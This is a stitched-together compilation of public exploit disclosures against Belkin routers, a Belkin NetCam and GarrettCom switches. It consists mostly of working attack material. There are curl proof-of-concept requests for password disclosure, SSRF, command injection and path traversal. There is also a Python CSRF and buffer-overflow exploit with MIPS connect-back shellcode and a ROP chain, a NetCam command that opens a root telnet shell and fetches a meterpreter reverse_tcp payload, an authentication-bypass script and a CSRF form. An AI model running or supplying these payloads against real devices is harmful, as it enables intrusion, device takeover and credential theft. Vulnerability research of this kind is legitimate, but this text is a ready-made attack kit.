# Vendor Homepage: http://www.belkin.com/fr/support/product/?pid=F9K1102as
# Firmware Link: http://cache-www.belkin.com/support/dl/F9K1102_WW_3.04.11.bin
== Wireless Fingerprinting ==
#===========================================
:ESSID: "belkin.XXX"
:Mode: Master
:Encryption key WPA2 Version 1 CCMP PSK: on
:Wireless Password/PIN: 8-alphanumeric
:DHCP: enable (192.168.2.1)
:MAC Address: 58:EF:68
#===========================================
== Web Fingerprinting (With Locked Web Interface) ==
#===========================================
:www.shodan.io: "Server: httpd" "Cache-Control: no-cache,no-store,must-revalidate, post-check=0,pre-check=0" "100-index.htm"
#===========================================
:Device images:
/images/troubleshooting/checkWires.png (600x270)
/images/troubleshooting/startModem.png (600x270)
/images/troubleshooting/stopModem.png (600x270)
/images/troubleshooting/restartRouter.png (600x270)
#===========================================
:Hardware version,Firmware version,Serial number,...: /cgi/cgi_st.js && /cgi/cgi_dashboard.js
#===========================================
== PoC ==
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
:Disclore wifi password:
curl --silent "http://192.168.2.1/langchg.cgi"
||
curl --silent "http://192.168.2.1/adv_wifidef.cgi"
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
:Closed "HTTPD server" port:
curl --silent "http://192.168.2.1/removepwd.cgi" --data ""
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
:Web Backdoor:
http://192.168.2.1/dev.htm
> ?
> sh
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
:Server-Side Request Forgery (HTTP/FTP):
{45.33.32.156 == scanme.nmap.org}
curl --silent "http://192.168.2.1/proxy.cgi?chk&url=http://45.33.32.156/"
||
curl --silent "http://192.168.2.1/proxy.cgi?chk&url=ftp://45.33.32.156/"
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
:Command Injection:
curl --silent "http://192.168.2.1/proxy.cgi?chk&url=--help"
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
##Full Disclosure:
#Exploit Title : Belkin N150 Wireless Home Router Multiple
Vulnerabilities
#Exploit Author : Rahul Pratap Singh
#Date : 30/Nov/2015
#Home Page Link : http://www.belkin.com
#Blog Url : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Status : Not Patched
→ Vulnerability/BUG Report :
1)
• Vulnerability Title : HTML/Script Injection
• Version : F9K1009 v1
• Firmware : 1.00.09
→ Proof of Concept:
"InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language" this parameter is
vulnerable.
https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/
→ Steps to Reproduce:
Send the following post request using Burpsuite,etc
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101
Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 260
%3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language="><script>alert("1")</script><script>"&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&getpage=html%2Findex.html&errorpage=html%2Findex.html&var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D
2)
• Vulnerability Title : Session Hijacking
• Version : F9K1009 v1
• Firmware : 1.00.09
→ Proof of Concept:
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
sessionid is allocated using hex encoding and of fixed length i.e 8 .
Therefore, it is very easy to bruteforce it in feasible amount for time as
this session id ranges from 00000000 to ffffffff
→ Steps to Reproduce:
Send the following request using Burpsuite and Bruteforce the sessionid.
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101
Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
3)
• Vulnerability Title : Telnet Enabled with Default Pass
• Version : F9K1009 v1
• Firmware : 1.00.09
→ Vulnerability Details:
Telnet protocol can be used by an attacker to gain remote access to the
router with root privileges.
→ Proof of Concept:
https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/
→ Steps to Reproduce:
1) Open terminal
2) Type following command:
telnet 192.168.2.1
3) Default user and pass is root:root
4)
• Vulnerability Title : Cross Site Request Forgery
• Version : F9K1009 v1
• Firmware : 1.00.09
→ Proof of Concept:
Request doesn't contain any CSRF-token. Therefore, requests can be forged.
It can be verified with any request.
Status:
Vendor Notified: 20 Oct 2015
Vendor Notified Again: 25 Nov 2015
No Response.
Full Disclosure: 30 Nov 2015
Ref:
https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/
# Title: Path Traversal Vulnerability
# Product: Belkin Router N150
# Author: Rahul Pratap Singh
# Website: https://0x62626262.wordpress.com
# Contact:
Linkedin: https://in.linkedin.com/in/rahulpratapsingh94
Twitter: @0x62626262
# Vendor Homepage: http://www.belkin.com
# Firmware Tested: 1.00.08, 1.00.09
# CVE: 2014-2962
Description:
Belkin N150 wireless router firmware versions 1.00.07 and earlier contain a
path traversal vulnerability through the built-in web interface. The
webproc cgi
module accepts a getpage parameter which takes an unrestricted file path as
input. The web server runs with root privileges by default, allowing a
malicious attacker to read any file on the system.
A patch was released by Belkin but that is still vulnerable.
POC:
http://192.168.2.1/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
#root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh
Ref:
https://www.kb.cert.org/vuls/id/774788
https://0x62626262.wordpress.com/category/full-disclosure/
import socket, sys , base64, struct, string, urllib
from getopt import getopt as GetOpt, GetoptError
from uuid import getnode as get_mac
import SimpleHTTPServer, SocketServer
# TIMELINE #
'''
3/16/2016 - First Submission to Belkin [no response]
5/3/2016 - Second Submission to Belkin [no response]
6/4/2016 - Notification of 0day [vendor responded]
Vendor Response: Our email system was broken but we want another 90 days.
9/3/2016 - Notification of 0day sent to Belkin. [no response]
9/4/2016 - The second 90 day extension is over.
'''
# Root cause analysis and all of that fun stuff
'''
This is the CSRF PoC. You will need to embed your JS soruce somewhere. '<script src=//ip.addr/a.js>'
The SSID of the F9K1122v1 does not escape HTML chars so XSS is possible.
XSS is also possible during provisioning. It does not escape HTML chars while scanning for SSIDs.
There is no protection against CSRFs so I made this CSRF PoC.
The BoF Vulnerability:
File Name: fmmgmt.c
-------------------------------------------------------------
void formSetLanguage(webs_t wp, char_t *path, char_t *query)
{
[CUT]
...
if(apmib_set(MIB_WEB_LANGUAGE, (void *)&type)==0){
strcpy(tmpbuf, T("Set WEB language error!"));
goto setErr;
}
apmib_update(CURRENT_SETTING);
setErr:
urltmp = websGetVar(wp, T("webpage"), T(""));
sprintf(tmpbuf, "/%s", urltmp);
-------------------------------------------------------------
In a nutshell, cause the error and then the webpage parameter will get picked up and then sprintf! yay!
ASLR is broken on this device so ret2libc is possible. Stack + Heap = Executable.
'''
# GREETZ
'''
@AustinHackers - I love you all <3
@Laughing_Mantis - Cause I said I would!
@MisterCh0c - Keep on h4x0ring IoT products!
@IoTVillage - You guys rock!
@HeadlessZeke - Thanks for influcencing me to challenge myself aka I wanted to show you up :D
@avicoder - cause you're awesome! :D
@TheZDI - If it weren't for your comment of wanting me to bypass auth then I wouldn't of found these vulns.
Everyone over at Praetorian - You guys are awesome <3.
'''
def usage():
print ""
print "CSRF Generator --> Buffer Overflow PoC [Needs to be ran as a SuperUser]"
print "By: Elvis Collado [b1ack0wl]"
print ""
print "Usage: %s -s source.ip -d dst.ip" % sys.argv[0]
print ""
print "\t-s Connect back IP [LHOST]"
print "\t-d Destination IP of Socket Listener [RHOST]"
print "\t-h Print this Help Menu"
print ""
sys.exit(1)
# Hacky but whatever it gets the point across.
if len(sys.argv) < 3:
usage()
try:
(opts, args) = GetOpt(sys.argv[1:], 's:d:h')
except GetoptError, e:
usage()
for opt, arg in opts:
if opt == "-s":
connectback_ip = arg.split(".")
for a in connectback_ip:
if int(a) == 0:
print "IP cannot have NULL Bytes :("
sys.exit(1)
IP_1= struct.pack("<B",int(connectback_ip[0]))
IP_2= struct.pack("<B",int(connectback_ip[1]))
IP_3= struct.pack("<B",int(connectback_ip[2]))
IP_4= struct.pack("<B",int(connectback_ip[3]))
elif opt == "-d":
host = arg
elif opt == "-h":
usage()
# Shellcode from bowcaster.
shellcode = string.join([
"\x24\x0f\xff\xfa", # li t7,-6
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\x21\xe4\xff\xfd", # addi a0,t7,-3
"\x21\xe5\xff\xfd", # addi a1,t7,-3
"\x28\x06\xff\xff", # slti a2,zero,-1
"\x24\x02\x10\x57", # li v0,4183
"\x01\x01\x01\x0c", # syscall 0x40404
"\xaf\xa2\xff\xff", # sw v0,-1(sp)
"\x8f\xa4\xff\xff", # lw a0,-1(sp)
"\x34\x0f\xff\xfd", # li t7,0xfffd
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\xaf\xaf\xff\xe0", # sw t7,-32(sp)
# Port 8080
"\x3c\x0e\x1f\x90", # lui t6,0x1f90
"\x35\xce\x1f\x90", # ori t6,t6,0x1f90
# Store Port
"\xaf\xae\xff\xe4", # sw t6,-28(sp)
# Big endian IP address 192.168.206.2
"\x3c\x0e"+IP_1+IP_2, # lui t6,0x7f01
"\x35\xce"+IP_3+IP_4, # ori t6,t6,0x101
"\xaf\xae\xff\xe6", # sw t6,-26(sp)
"\x27\xa5\xff\xe2", # addiu a1,sp,-30
"\x24\x0c\xff\xef", # li t4,-17
"\x01\x80\x30\x27", # nor a2,t4,zero
"\x24\x02\x10\x4a", # li v0,4170
"\x01\x01\x01\x0c", # syscall 0x40404
"\x24\x0f\xff\xfd", # li t7,-3
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\x8f\xa4\xff\xff", # lw a0,-1(sp)
"\x01\xe0\x28\x21", # move a1,t7
"\x24\x02\x0f\xdf", # li v0,4063
"\x01\x01\x01\x0c", # syscall 0x40404
"\x24\x10\xff\xff", # li s0,-1
"\x21\xef\xff\xff", # addi t7,t7,-1
"\x15\xf0\xff\xfa", # bne t7,s0,68 <dup2_loop>
"\x28\x06\xff\xff", # slti a2,zero,-1
"\x3c\x0f\x2f\x2f", # lui t7,0x2f2f
"\x35\xef\x62\x69", # ori t7,t7,0x6269
"\xaf\xaf\xff\xec", # sw t7,-20(sp)
"\x3c\x0e\x6e\x2f", # lui t6,0x6e2f
"\x35\xce\x73\x68", # ori t6,t6,0x7368
"\xaf\xae\xff\xf0", # sw t6,-16(sp)
"\xaf\xa0\xff\xf4", # sw zero,-12(sp)
"\x27\xa4\xff\xec", # addiu a0,sp,-20
"\xaf\xa4\xff\xf8", # sw a0,-8(sp)
"\xaf\xa0\xff\xfc", # sw zero,-4(sp)
"\x27\xa5\xff\xf8", # addiu a1,sp,-8
"\x24\x02\x0f\xab", # li v0,4011
"\x01\x01\x01\x0c" # syscall 0x40404
], '')
# getRect() son
huge_string = "IMETHANBRADBERRY " * 6 # I was watching A LOT of Youtube at the time. So I made my padding "IMETHANBRADBERRY" cause it made me lol. :D
huge_string += "!" # Filler
huge_string += struct.pack(">L", 0x2aaf2c80) # s0 Function to LIBC Sleep
huge_string += "\x43\x43\x43\x43" # s1 but after sleep it's just padding
huge_string += struct.pack(">L",0x2aafc840) # RA OverWrite # move t9,s0 jalr t9
huge_string += "\x44\x44\x44\x44" * 6 # padding
huge_string += struct.pack(">L",0x31313131) # s0 - Sleep
huge_string += struct.pack(">L",0x2aafc840) # s1
huge_string += struct.pack(">L",0x34343434) # s2
huge_string += struct.pack(">L",0x2aaf9f38) # Second Rop Chain RA
huge_string += "\x45\x45\x45\x45" * 9 # Padding
huge_string += struct.pack(">L",0x2aaf9808) # Third ROP Chain RA
huge_string += "\x46\x46\x46\x46" * 10
huge_string += struct.pack(">L",0x2739e8b8) # Hacky NOP Sled YoloSwagSecurity(tm) Style :D
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2aaf97fc) # Fourth ROP Chain (Stack Exec). $PC will point to the Hacky NOP Sled.
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += "\x47\x47\x47\x47" # Padding becomes NULL
huge_string += shellcode # shellcode start
'''
NOTES
libc = 0x2aad0000
0x2aafc840 (Sleep)
Gadget 1
0x2aafc840: move t9,s0 # Sleep
0x2aafc844: jalr t9 # call sleep. The rest of the instructions will not block out payload and are not included.
Gadget 2
0x2aaf9f38: move t9,s1 # Addr to Gadget 3
0x2aaf9f3c: lw ra,52(sp)
0x2aaf9f40: lw s3,48(sp)
0x2aaf9f44: lw s2,44(sp)
0x2aaf9f48: lw s1,40(sp)
0x2aaf9f4c: lw s0,36(sp)
0x2aaf9f50: jr t9 # Call Gadget 3
Gadget 3
0x2aaf9808: addiu a0,sp,24 # Add offet +24 to SP and store it in A0
0x2aaf980c: lw ra,52(sp) # load Ret addr
0x2aaf9810: jr ra # ret
Gadget 4 (Stack Exec)
0x2aaf97fc: move t9,a0 # move A0 which contains the address of the stack
0x2aaf9800: sw v0,24(sp)
0x2aaf9804: jalr t9 # Jump to the stack
0x2aaf9808: addiu a0,sp,24 # Before jumping, add +24 to the stack and store it in A0
'''
csrf_file = open('a.js', 'wb')
params = urllib.urlencode({'webpage': huge_string}) # Vulnerable parameter
destination_addr = 'x.open("POST", "http://' + host + '/goform/formSetLanguage"' + ',true);\n' # Vulnerable Endpoint that does not require authentication
# Write CSRF PoC
csrf_file.write('function getrekt(){')
csrf_file.write('var x = new XMLHttpRequest();\n')
csrf_file.write(destination_addr)
csrf_file.write('x.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); \n')
csrf_file.write('x.send("' + params + '");')
csrf_file.write('}\ngetrekt();')
# Close file since we're doing writing to it.
csrf_file.close()
# Now Host the CSRF File
mac = get_mac()
PORT = 80 # This is why superuser rights are needed
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
mac_addr = ':'.join(("%012X" % mac)[i:i+2] for i in range(0, 12, 2))
print "[\033[1;32m+\033[0m] Serving CSRF File on port:", PORT
print "[\033[1;32m+\033[0m] Copy the following string to bypass HTTPd authentication: \033[1;33m" + "echo \"" + mac_addr.lower() + "\" > /var/remote_mac_addr\033[0m"
httpd.serve_forever()
# Exploit Title: Belkin NetCam F7D7601 | Remote Command Execution
# Date: 17/07/17
# Exploit Author: Wadeek
# Vendor Homepage: http://www.belkin.com/
# Tested on: Belkin NetCam F7D7601 (WeMo_NetCam_WW_2.00.10684.PVT)
================================================
##
UnsetupMode == [0]
Hard-coded password admin:admin - SetupMode == [1]
##
================================================
##
[1] BusyBox version & Linux version & gcc version >> GET http://[IP]:80/goform/syslog
[1] System version >> GET http://[IP]:80/goform/getSystemSettings?systemModel&systemVersion&brandName&longBrandName
[1] Camera snapshot >> GET http://[IP]:80/goform/snapshot
[1] Camera streaming >> GET http://[IP]:80/goform/video
[101] Disclosure username and password on netcam.belkin.com >> GET http://[IP]:80/goform/apcamMode
[101] Disclosure wifi password >> GET http://[IP]:80/apcam/for-android/aplist.asp
[0] Firmware version >> GET http://[IP]:[49150..49159]/setup.xml
##
================================================
#||
================================================
[0] Network Fingerprinting
##
80/tcp open http
HTTP/1.1 404 Site or Page Not Found
Server: Camera Web Server
<title>Document Error: Site or Page Not Found</title>
<h2>Access Error: Site or Page Not Found</h2>
<p>Page Not Found</p>
&&
[49150..49159]/tcp open UPnP
HTTP/0.0 400 Bad Request
SERVER: Unspecified, UPnP/1.0, Unspecified
<h1>400 Bad Request</h1>
##
================================================
#||
================================================
[1] Wireless Fingerprinting
##
ESSID:"NetCamXXXX"
Encryption key:off
Address: C0:56:27
##
[1] Network Fingerprinting
##
80/tcp open http
HTTP/1.1 401 Unauthorized
Server: Camera Web Server
WWW-Authenticate: Basic realm="Camera Web Server"
<title>Document Error: Unauthorized</title>
<h2>Access Error: Unauthorized</h2>
<p>Access to this document requires a User ID</p>
##
[1] Remote Command Execution
/!/ !/
:~$ curl 'http://[IP]/goform/SystemCommand?command=telnetd%20-l%20/bin/sh' -H 'Authorization: Basic YWRtaW46YWRtaW4='
:~$ telnet [IP] 23
upload by FTP # ftpput -v -u [USERNAME] -p [PASSWORD] -P [PORT] [IP] [REMOTE-FILENAME] [LOCAL-FILENAME]
upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
/!/ !/
================================================
source: https://www.securityfocus.com/bid/59476/info
Belkin F5D8236-4 Router is prone to a cross-site request-forgery vulnerability.
Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
<html> <head> <title>Belkin F5D8236-4 v2 CSRF - Enable Remote MGMT.</title> <!-- Use JavaScript debugging to bypass authentication --> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="belkin" action="http://X.X.X.X/cgi-bin/system_setting.exe" method="post"/> <input type="hidden" name="remote_mgmt_enabled" value="1"/> <input type="hidden" name="remote_mgmt_port" value="31337"/> <input type="hidden" name="allow_remote_ip" value="0"/> </form> <script> function BeLkIn() {document.belkin.submit();}; window.setTimeout(BeLkIn, 0000); </script> <body> </html>
'''
# Exploit Title: Belkin Router AC1200, Firmware: 1.00.27 - Authentication Bypass
# Date: 5/11/2016
# Exploit Author: Gregory Smiley
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://www.belkin.com
# Version: Firmware: 1.00.27
# Tested on:F9K1113 v1
#1. Description:
#The Belkin AC1200 is vulnerable to authentication bypass due to it performing client side
#authentication after you attempt to login after already having failed a login. That webpage, loginpserr.stm contains the md5 hash value of the administrators password. This can be
#exploited by extracting that hash value, and passing it in the pws field in a post request to
#login.cgi.
#I would like to note that I contacted Belkin on several occasions
#and gave them plenty of time to reply/fix the issue before releasing this entry.
#2. Proof:
#Line 55 of loginpserr.stm contains the javascript code:
#var password = "md5hashofpassword";
#3. Exploit:
'''
#!/usr/bin/python
import urllib
import urllib2
import sys
router = raw_input('Enter IP address of your AC1200 to test: ')
page = urllib2.urlopen('http://'+router+'/loginpserr.stm').read()
test_page = page
vuln_string = 'var password = "'
if vuln_string in test_page:
print 'Router is vulnerable.'
answer = raw_input('Would you like to exploit the target? Y/N : ')
else:
print 'Router is not vulnerable.'
print 'exiting...'
sys.exit()
if (answer == 'y') or (answer == 'Y'):
extract = test_page.split(vuln_string, 1)[1] #These two lines extract the leaked hash value
_hash = extract.partition('"')[0] #from /loginpserr.stm using quotes as a delimiter
else:
if (answer == 'n') or (answer == 'N'):
print 'exiting...'
sys.exit()
#Assemble the POST request to /login.cgi
headers = {
'Host': router,
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0',
'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language' : 'en-US,en;q=0.5',
'Accept-Encoding' : 'gzip, deflate',
'Referer' : 'http://'+router+'/',
'Connection': 'keep-alive',
'Content-Type': 'application/x-www-form-urlencoded'
}
data = {
'totalMSec':'0',
'pws': _hash,
'url':'status.stm',
'arc_action':'login',
'pws_temp': ''
}
data = urllib.urlencode(data)
#Sends the POST request with the hash in the pws field
req = urllib2.Request('http://'+router+'/login.cgi', data, headers)
response = urllib2.urlopen(req)
the_page = response.read()
print 'Exploit successful.'
print 'You are now free to navigate to http://'+router+'/ ...as admin ;)'
Introduction
------------
Vulnerabilities were identified in the Belden GarrettCom 6K and 10KT
(Magnum) series network switches. These were discovered during a black box
assessment and therefore the vulnerability list should not be considered
exhaustive; observations suggest that it is likely that further vulnerabilities
exist. It is strongly recommended that GarrettCom undertake a full whitebox
security assessment of these switches.
The version under test was indicated as: 4.6.0. Belden Garrettcom released
an advisory on 8 May 2017, indicating that issues were fixed in 4.7.7:
http://www.belden.com/docs/upload/Belden-GarrettCom-MNS-6K-10K-Security-Bulletin-BSECV-2017-8.pdf
GarrettCom-01 - Authentication Bypass: Hardcoded Web Interface Session Token
----------------------------------------------------------------------------
Severity: **High**
The string "GoodKey" can be used in place of a session token for the web
interface, allowing a complete bypass to all web interface authentication.
The following request/response demonstrates adding a user ‘gibson’ with the
password ‘god’ on any GarrettCom 6K or 10K switch.
GET /gc/service.php?a=addUser&uid=gibson&pass=god&type=manager&key=GoodKey
HTTP/1.1
Host: 192.168.0.2
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/56.0.2924.28 Safari/537.36
Accept: */*
Referer: https://192.168.0.2/gc/flash.php
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8
HTTP/1.0 200 OK
Server: GoAhead-Webs
Content-Type: text/html
<?xml version='1.0' encoding='UTF-8'?><data val="users"><changed
val="yes" />
<helpfile val="user_accounts.html" />
<user uid="operator" access="Operator" />
<user uid="manager" access="Manager" />
<user uid="gibson" access="Manager" />
</data>
GarrettCom-02 - Secrets Accessible to All Users
-----------------------------------------------
Severity: **High**
Unprivileged but authenticated users ("operator" level access) can view the
plaintext passwords of all users configured on the system, allowing them to
escalate privileges to "manager" level. While the default "show config"
masks the passwords, executing "show config saved" includes the plaintext
passwords. The value of the "secrets" setting does not affect this.
6K>show config group=user saved
...
#User Management#
user
add user=gibson level=2 pass=god
Exit
...
GarrettCom-03 - Stack Based Buffer Overflow in HTTP Server
----------------------------------------------------------
Severity: **High**
When rendering the /gc/flash.php page, the server performs URI encoding of
the Host header into a fixed-length buffer on the stack. This decoding appears
unbounded and can lead to memory corruption, possibly including remote code
execution. Sending garbage data appears to hang the webserver thread after
responding to the present request. Requests with Host headers longer than
220 characters trigger the observed behavior.
GET /gc/flash.php HTTP/1.1
Host: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/56.0.2924.28 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,
image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8
GarrettCom-04 - SSL Keys Shared Across Devices
----------------------------------------------
Severity: **Moderate**
The SSL certificate on all devices running firmware version 4.6.0 is the
same. This issue was previously reported and an advisory released by
ICS-CERT. While GarrettCom reported the issue was fixed in 4.5.6, the web
server certificate remains static in 4.6.0:
openssl s_client -connect 192.168.0.5:443 -showcerts
CONNECTED(00000003)
depth=0 C = US, ST = California, L = Fremont, O = Belden, OU =
Technical Support, CN = 192.168.1.2, emailAddress = gcisupport@belden.com
verify error:num=18:self signed certificate
verify return:1
depth=0 C = US, ST = California, L = Fremont, O = Belden, OU =
Technical Support, CN = 192.168.1.2, emailAddress = gcisupport@belden.com
verify return:1
---
Certificate chain
0 s:/C=US/ST=California/L=Fremont/O=Belden/OU=Technical Support/CN=
192.168.1.2/emailAddress=gcisupport@belden.com
i:/C=US/ST=California/L=Fremont/O=Belden/OU=Technical Support/CN=
192.168.1.2/emailAddress=gcisupport@belden.com
-----BEGIN CERTIFICATE-----
MIIEtTCCA52gAwIBAgIBADANBgkqhkiG9w0BAQUFADCBnTELMAkGA1UEBhMCVVMx
EzARBgNVBAgTCkNhbGlmb3JuaWExEDAOBgNVBAcTB0ZyZW1vbnQxDzANBgNVBAoT
BkJlbGRlbjEaMBgGA1UECxMRVGVjaG5pY2FsIFN1cHBvcnQxFDASBgNVBAMTCzE5
Mi4xNjguMS4yMSQwIgYJKoZIhvcNAQkBFhVnY2lzdXBwb3J0QGJlbGRlbi5jb20w
HhcNMTUxMDI3MTEyNzQ2WhcNMjUxMDI0MTEyNzQ2WjCBnTELMAkGA1UEBhMCVVMx
EzARBgNVBAgTCkNhbGlmb3JuaWExEDAOBgNVBAcTB0ZyZW1vbnQxDzANBgNVBAoT
BkJlbGRlbjEaMBgGA1UECxMRVGVjaG5pY2FsIFN1cHBvcnQxFDASBgNVBAMTCzE5
Mi4xNjguMS4yMSQwIgYJKoZIhvcNAQkBFhVnY2lzdXBwb3J0QGJlbGRlbi5jb20w
ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDFlt+j4OvpcgfdrFGnBxti
ds6r9sNEcR9JdAFbOmwybQkdqIw9Z9+teU/rixPocEE4gL8beNuw/D3lDc4RJ63m
1zuQ1riFOkTsz7koKQNWTh3CkIBE7843p5I/GVvhfR7xNCCmCWPdq+6/b3nhott5
oBeMLOjIWnjFgyVMsWR22JOYv+euWwr4oqZDLfBHjfipnu36J1E2kHLG3TL9uwyN
DUxtrIbvfi5tOxi8tx1bxZFQU1jxoQa725gO+1TOYzfSoY1a7/M0rMhJM1wFXak6
jbDbJLSv2TXMWrSJlGFUbCcKv3kE22zLcU/wx1Xl4a4NNvFW7Sf5OG2B+bFLr4fD
AgMBAAGjgf0wgfowHQYDVR0OBBYEFLtGmDWgd773vSkKikDFSz8VOZ7DMIHKBgNV
HSMEgcIwgb+AFLtGmDWgd773vSkKikDFSz8VOZ7DoYGjpIGgMIGdMQswCQYDVQQG
EwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTEQMA4GA1UEBxMHRnJlbW9udDEPMA0G
A1UEChMGQmVsZGVuMRowGAYDVQQLExFUZWNobmljYWwgU3VwcG9ydDEUMBIGA1UE
AxMLMTkyLjE2OC4xLjIxJDAiBgkqhkiG9w0BCQEWFWdjaXN1cHBvcnRAYmVsZGVu
LmNvbYIBADAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4IBAQBAiuv06CMD
ij+9bEZAfmHftptG4UqsNgYIFZ1sN7HC6RBR9xy45fWVcQN3l3KiyddLsftbZSOa
CRPpzqgpF58hGwAa7+yQPOjOWf+uLc9Oyex6P9ewAo6c5iiYI865FSQ+QCY4xbD1
Uk/WFV2LKOzxkXPRcVB4KR81g8tSZF3E8llybhEngg7cvN3uHpO5a5U085xuBbcF
To9PSbGKyJ7UGESBTD6KxLWAxoD6VGRV2CAZa/F9RTbdG1ZbTUMvoEDmYqv7Pjv/
ApZzztLJlCyhVM4N/jh/Q/g1VaQWuzPpza6utjN5soUxeZYJB6KwzGUiLnyTNBJz
L4JtsUO8AcWb
-----END CERTIFICATE-----
Note that Belden Garrettcom has addressed this issue by reinforcing that
users of the switches should install their own SSL certificates if they
do not want to use the default certificate and key.
GarrettCom-05 - Weak SSL Ciphers Enabled
----------------------------------------
Severity: **Moderate**
Many of the SSL ciphers available for the switch are outdated or use
insecure ciphers or hashes. Additionally, no key exchanges with perfect forward
secrecy are offered, rendering all previous communications possibly compromised,
given the issue reported above. Particularly of note is the use of 56-bit DES,
RC4, and MD5-based MACs.
ssl3: AES256-SHA
ssl3: CAMELLIA256-SHA
ssl3: DES-CBC3-SHA
ssl3: AES128-SHA
ssl3: SEED-SHA
ssl3: CAMELLIA128-SHA
ssl3: RC4-SHA
ssl3: RC4-MD5
ssl3: DES-CBC-SHA
tls1: AES256-SHA
tls1: CAMELLIA256-SHA
tls1: DES-CBC3-SHA
tls1: AES128-SHA
tls1: SEED-SHA
tls1: CAMELLIA128-SHA
